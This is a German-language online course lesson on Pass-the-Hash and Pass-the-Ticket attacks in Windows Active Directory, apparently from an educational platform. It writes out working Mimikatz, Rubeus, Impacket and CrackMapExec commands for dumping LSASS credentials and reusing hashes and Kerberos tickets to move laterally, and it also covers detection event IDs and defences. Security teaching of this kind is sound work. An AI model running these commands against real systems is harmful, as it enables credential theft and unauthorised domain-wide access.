Pass-the-Hash- und Pass-the-Ticket-Angriffe
Verwenden Sie Credential-Hashes und Kerberos-Tickets, um sich lateral zu bewegen, ohne Klartextpasswörter zu kennen.
Pass-the-Hash- und Pass-the-Ticket-Angriffe ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 2 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Warum diese Angriffe möglich sind
Windows-Anmeldeprotokolle speichern Authentifizierungsgeheimnisse (NTLM-Hashes und Kerberos-Tickets) im Arbeitsspeicher. Ein Angreifer mit SYSTEM-Berechtigungen kann diese Geheimnisse auslesen und wiederverwenden, um sich als andere Benutzer zu authentifizieren, ohne deren Passwörter zu kennen.
NTLM-Hashes mit Mimikatz extrahieren
Mimikatz ist das führende Tool zum Extrahieren von Anmeldeinformationen unter Windows. Bei Ausführung als SYSTEM/Administrator liest es den Speicher des LSASS-Prozesses aus, um NTLM-Hashes und Klartext-Anmeldeinformationen zu extrahieren.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samPass-the-Hash (PtH) mit Mimikatz
PtH schleust einen NTLM-Hash in eine neue Sitzung ein, ohne dass das Klartextpasswort bekannt sein muss. Der Hash authentifiziert sich über NTLM bei Remotediensten und eignet sich dadurch für die laterale Bewegung zu anderen Windows-Hosts.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userPass-the-Hash mit Impacket
Impacket stellt Python-Tools für PtH bereit: psexec.py, smbexec.py und wmiexec.py akzeptieren NTLM-Hashes direkt zur Ausführung von Befehlen auf Remotesystemen.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cKerberos-Tickets extrahieren
Kerberos-Tickets werden ebenfalls im LSASS-Speicher abgelegt. Mimikatz extrahiert sie; Rubeus ist das spezialisierte Tool für Operationen mit Kerberos-Tickets unter Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtPass-the-Ticket (PtT)
PtT schleust ein gestohlenes Kerberos-Ticket in die aktuelle Sitzung ein. Das Ticket authentifiziert den Benutzer bei Diensten als ursprünglichen Besitzer des Tickets. Dafür werden weder Hash noch Passwort benötigt.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistLSASS remote auslesen
Von einem Ausgangspunkt im Netzwerk aus können Sie LSASS mit CrackMapExec oder secretsdump aus Impacket remote auslesen. Eine interaktive Sitzung auf dem Ziel ist dafür nicht erforderlich.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Pfade für laterale Bewegung
Nach dem Erlangen von Hashes oder Tickets können Sie sich lateral bewegen: mit PtH und wiederverwendeten lokalen Administratorkonten auf andere Computer, mit PtT auf Domänendienste zugreifen und durch das Angreifen privilegierter Konten bis zur Domänenadministration eskalieren.
PtH und PtT erkennen
Verteidiger erkennen PtH anhand von Event ID 4624 (Anmeldung) mit Anmeldetyp 3 ohne zugehörige interaktive Anmeldung, anhand von Anomalien bei der NTLM-Authentifizierung sowie anhand von Mimikatz-Signaturen im Speicher oder auf dem Datenträger.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useSchutzmaßnahmen
Wichtige Schutzmaßnahmen sind: Credential Guard aktivieren (schützt LSASS durch Virtualisierung), die Wiederverwendung lokaler Administratorkonten auf mehreren Computern einschränken (LAPS), die Gruppe Protected Users für privilegierte Konten erzwingen und NTLM, wo möglich, deaktivieren.
Overpass-the-Hash
Overpass-the-Hash wandelt einen NTLM-Hash in ein Kerberos-TGT um. Das ist in Umgebungen nützlich, in denen NTLM blockiert, Kerberos aber verfügbar ist, oder wenn Sie für weitere Kerberos-Angriffe ein TGT benötigen.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Schnelltest
Welche Windows-Sicherheitsfunktion schützt die Speicherung von LSASS-Anmeldeinformationen durch Virtualisierung?
Zusammenfassung: PtH und PtT
Pass-the-Hash und Pass-the-Ticket bilden das Rückgrat der lateralen Bewegung in Active Directory. Beide Methoden nutzen den Anmeldeinformations-Cache von Windows in LSASS aus. Mimikatz und Impacket machen das Extrahieren und Wiederverwenden trivial. Schützen Sie sich mit Credential Guard, LAPS, der Gruppe Protected Users und einer strengen Überwachung von NTLM- und Kerberos-Authentifizierungsereignissen.
Häufig gestellte Fragen
Ist die Lektion „Pass-the-Hash- und Pass-the-Ticket-Angriffe“ kostenlos?
Ja — der vollständige Text von „Pass-the-Hash- und Pass-the-Ticket-Angriffe“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Pass-the-Hash- und Pass-the-Ticket-Angriffe“?
Verwenden Sie Credential-Hashes und Kerberos-Tickets, um sich lateral zu bewegen, ohne Klartextpasswörter zu kennen. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 2 von 4.
Wie lange dauert die Lektion „Pass-the-Hash- und Pass-the-Ticket-Angriffe“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Windows-Authentifizierung: NTLM und Kerberos
- Pass-the-Hash- und Pass-the-Ticket-Angriffe
- Kerberoasting und AS-REP-Roasting
- Absicherung von Active Directory